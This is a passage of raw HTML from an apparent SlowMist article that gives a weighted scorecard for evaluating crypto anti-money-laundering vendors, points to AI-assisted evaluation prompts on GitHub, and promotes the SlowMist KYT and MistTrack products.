PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">数据质量</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">30%</span></span></p></td><td></td><td></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">标签准确度、更新速度</span></span></p></td></tr><tr><td data-colwidth="115"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">功能完备</span></span><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">性</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">25%</span></span></p></td><td></td><td></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">聚类分析、跨链追踪</span></span></p></td></tr><tr><td data-colwidth="115"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">易用性</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">15%</span></span></p></td><td></td><td></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">UI/UX、案件管理流程</span></span></p></td></tr><tr><td data-colwidth="115"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">技术性能</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">15%</span></span></p></td><td></td><td></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">API 延迟、稳定性</span></span></p></td></tr><tr><td data-colwidth="115"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">成本</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">10%</span></span></p></td><td></td><td></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">初始费用、API 调用费</span></span></p></td></tr><tr><td data-colwidth="115"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">服务支持</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">5%</span></span></p></td><td></td><td></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">响应速度、培训支持</span></span></p></td></tr><tr><td data-colwidth="115"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">总分</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">1</span></span><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">00%</span></span></p></td><td></td><td></td><td></td></tr></tbody></table><p><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:null,&#34;id&#34;:&#34;docs-internal-guid-67e318b9-7fff-bc60-bf76-6ef126538e1b&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;dir&#34;:&#34;ltr&#34;,&#34;style&#34;:&#34;text-indent: 0px; line-height: 25.6px; margin-bottom: 0px; text-align: left;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:null},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span textstyle="" style="font-size: 14px;font-weight: normal;">（评分卡示例）</span></span></p></b></b></b></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">此外，为了降低实际执行门槛，我们把整个测试流程整理成了一套可以直接使用的 AI 指令。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100020961" data-ratio="0.6351851851851852" width="602" data-type="png" data-w="1080" height="383" style="margin-left: 0px;margin-top: 0px;" src="https://wechat2rss.xlab.app/img-proxy/?k=7a815003&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F8z8bibAexaCIuAibAHhJlUBfFvLxdI8BetjxJ9cicLmsV1WArQMAcc7gj4rj9bTW2VOkcotWyHghxu71qibLibMqITibCKb8ficBv17HPlM5h5p1C0%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">只需要从《Crypto AML 供应商评估 Checklist 与执行指南》的参考数据集中挑选地址或按照《AI 辅助 AML 供应商评估（逐步指南）》的步骤引导 AI 生成地址，将指南中的指令复制出来，把地址和各系统的查询结果提供给 AI（例如 Gemini），就可以自动完成后续工作：包括数据整理、结果对比、关键指标计算，以及基础评估结论的输出。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">完整步骤可以参考：</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><a href="https://github.com/slowmist/crypto-aml-vendor-evaluation/tree/main/AI-Assisted%20AML%20Vendor%20Evaluation%20(Step-by-Step%20Guide)" target="_blank">https://github.com/slowmist/crypto-aml-vendor-evaluation/tree/main/AI-Assisted%20AML%20Vendor%20Evaluation%20(Step-by-Step%20Guide)</a></span></span></p><h1 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: normal;"><span textstyle="" style="font-size: 24px;font-weight: bold;">写在最后</span></span></h1><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在同一套评估框架下，不同 AML 工具之间的差异，通常集中在数据质量、功能完备性、易用性、技术性能、成本和服务支持上。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">基于长期的安全研究与威胁情报积累，SlowMist KYT 在这些方面做了针对性的优化，包括多链风险标签的数据覆盖、基于资金贡献度的风险计算方式、多层级的链上路径分析能力，以及持续监控与历史数据自动复筛机制。同时，在合规侧支持 STR 报告生成与审计留痕，以满足监管对可追溯性的要求。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">如希望更直观地了解相关能力，点击「阅读原文」填写表单，即可申请免费试用与 Demo 演示，或联系邮箱：</span></span><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">kyt@slowmist.com</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="color: rgb(255, 0, 0);font-weight: normal;">限时福利： 截止至 2026 年 12 月，采购 SlowMist KYT 享受 8 折优惠！</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">关于慢雾 AML 能力体系</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">依托慢雾(SlowMist) 深耕多年的区块链生态安全与威胁情报能力，慢雾(SlowMist) 构建了业内领先的加密货币反洗钱与合规体系。面对日益严格的全球监管环境与复杂的链上洗钱手法，该体系通过旗下两大核心产品 —— 慢雾反洗钱追踪系统 MistTrack 与面向大型机构合规团队的专业、实时反洗钱引擎 SlowMist KYT，为全球交易平台、金融机构、监管单位及个人用户提供覆盖事前、事中、事后的一体化解决方案，帮助用户在复杂多变的链上环境中实现风险可识别、可控制、可追溯。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100020960" data-ratio="0.475" width="602" data-type="png" data-w="1080" height="285" style="margin-left: 0px;margin-top: 0px;" src="https://wechat2rss.xlab.app/img-proxy/?k=8e83b5f6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F8z8bibAexaCJwA3LZbLuN9HOC4DnDvRzqSn2n1pavR0ibcicQQj2af240wK5hqluo4uG1moud9fXxbt8uc7P27VrceRhwK04A1MqRFVibCnZlcY%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">作为链上数据分析利器，MistTrack 专注于链上资金追踪、地址调查与标签识别。平台提供科学的风险评分算法与全面的地址概览，通过丰富的地址标签、交易对手与行为分析、地址痕迹剖析，结合强大的可视化交易图谱，帮助用户精准识别复杂的链上资金流向。同时，MistTrack 支持 KYT/KYA 分析、主动监控告警以及便捷的 API 接入，满足用户对链上资金调查与反洗钱的基本需求。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">为满足机构用户更高阶的合规审计和风险分析能力的需求，全新的 SlowMist KYT 在 KYT/KYA 风险筛查方面，基于慢雾丰富且动态更新的 AML 数据库，进行上下十层的深度风险分析，精准识别受制裁实体或暗网等高风险源，并利用可视化关联链路实现资金网络分析；支持高度灵活的风险规则配置，可按需加载适配不同司法管辖区的筛查参数，全面掌控风险评分计算逻辑；通过持续监测与自动化回溯，精准捕捉风险敞口变化，并自动生成时间序列 STR 报告，满足“可审计、可追溯”的合规标准；其内置的告警引擎与案件管理模块支持自定义实时告警阈值以过滤噪音，并能自动触发风险工单。从风险识别、追踪调查到工单处置，SlowMist KYT 真正实现了合规操作的完整闭环。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在全球监管不断趋严、链上风险持续演化的背景下，慢雾 AML 团队致力于以技术驱动合规能力升级，将复杂的链上行为转化为清晰、可信的风险洞察，持续为行业提供专业、可靠的安全与合规基础设施，助力构建更加透明、安全、可持续发展的区块链生态。</span></span></p></b></b></b></b></p><div style="white-space: normal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);color: rgb(160, 160, 160);font-size: 16px;margin-bottom: 0px;"><div style="padding-right: 10px;padding-left: 10px;font-size: 15px;line-height: 2;"><div style="letter-spacing: 0.544px;font-size: 16px;"><div style="margin-top: 10px;margin-bottom: 10px;text-align: left;"><div style="display: inline-block;width: 657.014px;vertical-align: top;border-bottom: 1px dashed rgb(160, 160, 160);border-bottom-right-radius: 0px;border-right: 1px dashed rgb(160, 160, 160);border-top-right-radius: 0px;border-left-width: 0px;"><div powered-by="xiumi.us"><div style="padding-right: 10px;padding-left: 10px;display: inline-block;border-style: solid;border-width: 1px 0px 0px 10px;box-shadow: rgb(0, 0, 0) 0px 0px 0px;border-color: rgb(54, 53, 53);border-radius: 0px;width: 629.769px;"><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">往期回顾</span></strong></span></p></div></div><div powered-by="xiumi.us"><div style="text-align: center;"><div style="padding: 10px 20px;display: inline-block;width: 656.019px;vertical-align: top;"><div style="margin-top: 8px;margin-bottom: 8px;"><div style="font-size: 14px;color: rgb(62, 62, 62);text-align: left;"><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504607&amp;idx=1&amp;sn=49e70d092b5e2e4d7278e85d822643f8&amp;scene=21#wechat_redirect" textvalue="活动回顾｜慢雾创始人余弦出席首届 Agentic AI 创新与安全论坛" data-itemshowtype="0" linktype="text" data-linktype="2">活动回顾｜慢雾创始人余弦出席首届 Agentic AI 创新与安全论坛</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504594&amp;idx=1&amp;sn=88d0a2ea27ea5f4bd87967e3411848f6&amp;scene=21#wechat_redirect" textvalue="Odaily专访余弦：Anthropic核弹级新模型泄漏，如何影响加密安全攻防？" data-itemshowtype="11" linktype="text" data-linktype="2">Odaily专访余弦：Anthropic核弹级新模型泄漏，如何影响加密安全攻防？</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504592&amp;idx=1&amp;sn=5b14e6284530b087155c3c9b13b86e3c&amp;scene=21#wechat_redirect" textvalue="慢雾：Web3 安全年框服务全面升级" data-itemshowtype="0" linktype="text" data-linktype="2">慢雾：Web3 安全年框服务全面升级</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504575&amp;idx=1&amp;sn=fa2ad5b1d103daaa52b67a16aa6fcef8&amp;scene=21#wechat_redirect" textvalue="安全预警：Apifox 桌面客户端官方 CDN 脚本遭供应链投毒" data-itemshowtype="0" linktype="text" data-linktype="2">安全预警：Apifox 桌面客户端官方 CDN 脚本遭供应链投毒</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504575&amp;idx=2&amp;sn=0602625406cc37b3c62e48b13ce706dd&amp;scene=21#wechat_redirect" textvalue="LiteLLM 供应链攻击事件始末" data-itemshowtype="0" linktype="text" data-linktype="2">LiteLLM 供应链攻击事件始末</a></span></p></div></div></div></div></div></div></div></div></div></div><p style="white-space: normal;text-align: center;margin-bottom: 0px;" nodeleaf=""><img class="rich_pages js_insertlocalimg wxw-img" data-aistatus="1" data-cropselx1="0" data-cropselx2="578" data-cropsely1="0" data-cropsely2="1973" data-fileid="100009827" data-ratio="3.9814814814814814" data-s="300,640" style="letter-spacing: 0.578px;text-align: center;white-space: normal;width: 558px;pointer-events: initial;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=81074fc1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FqsQ2ibEw5pLbEP8f4tadFenoLauzHpicWdWbVap3aia38LUGPflBho9ibDHXjoG5fecGJSaYa4S4zYdoicXibSmjv9tg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><div style="white-space: normal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);color: rgb(160, 160, 160);font-size: 16px;margin-bottom: 0px;"><div powered-by="xiumi.us" style="padding-right: 10px;padding-left: 10px;font-size: 